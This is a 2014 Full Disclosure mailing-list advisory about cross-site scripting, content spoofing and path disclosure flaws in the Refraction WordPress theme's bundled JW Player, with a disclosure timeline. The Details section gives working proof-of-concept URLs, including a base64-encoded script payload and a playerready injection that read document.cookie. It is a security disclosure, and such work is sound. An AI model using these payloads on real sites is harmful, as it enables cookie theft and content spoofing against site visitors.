[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Multiple vulnerabilities in Refraction theme for WordPress
From: "MustLive" <mustlive () websecurity ! com ! ua>
Date: 2014-09-30 18:07:25
Message-ID: 007a01cfdcd9$7369ef10$9b7a6fd5 () pc
[Download RAW message or body]
Hello list!
In 2012 I've disclosed vulnerabilities in JW Player and in RokBox. Which
were fixed by the developers - JW Player developers fixed one hole and
promised to fix others later and RokBox developers fixed all holes (but it
was questionable how they fixed holes related to JW Player).
In December 2012 I've wrote about 47 RocketTheme's themes for WordPress
(which contain RokBox). Besides their themes I've found similar
vulnerabilities in multiple themes of other developers (including custom
themes).
Now I'll inform you about multiple vulnerabilities in Refraction theme for
WordPress (there are thousands of web sites with it). These are Cross-Site
Scripting, Content Spoofing and Full path disclosure vulnerabilities.
The folder of theme can be named refraction or rt_refraction_wp.
-------------------------
Affected products:
-------------------------
Affected all versions of Refraction theme for WordPress (XSS an CS holes are
fixed in versions of themes with JW Player 6.x).
-------------------------
Affected vendors:
-------------------------
RocketTheme
http://www.rockettheme.com
----------
Details:
----------
Cross-Site Scripting (WASC-08):
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
This XSS vulnerability exists only in new version of theme with 5.x version
of JW Player:
http://site/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf?playerready=alert(document.cookie)
Content Spoofing (WASC-12):
In parameter file there can be set as video, as audio files.
Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
Content Spoofing (WASC-12):
Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
1.xml
<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>
Content Spoofing (WASC-12):
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site
Full path disclosure (WASC-13):
There are FPD In folder http://site/wp-content/themes/refraction/
(http://site/wp-content/themes/rt_refraction_wp/) in index.php and many
other php-files of theme.
------------
Timeline:
------------
2012.05.29 - informed developers of JW Player.
2012.08.18 - informed developers about new holes in JW Player Pro.
2012.08.28 - informed developers of Rokbox.
2012.12.14 - disclosed at my site about Rokbox.
2012.12.23 - disclosed to the lists the first part of vulnerable themes by
RocketTheme for WordPress.
2012.12.30 - disclosed to the lists the second part of vulnerable themes by
RocketTheme for WordPress.
2014.09.27 - disclosed at my site about Refraction theme
(http://websecurity.com.ua/7369/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic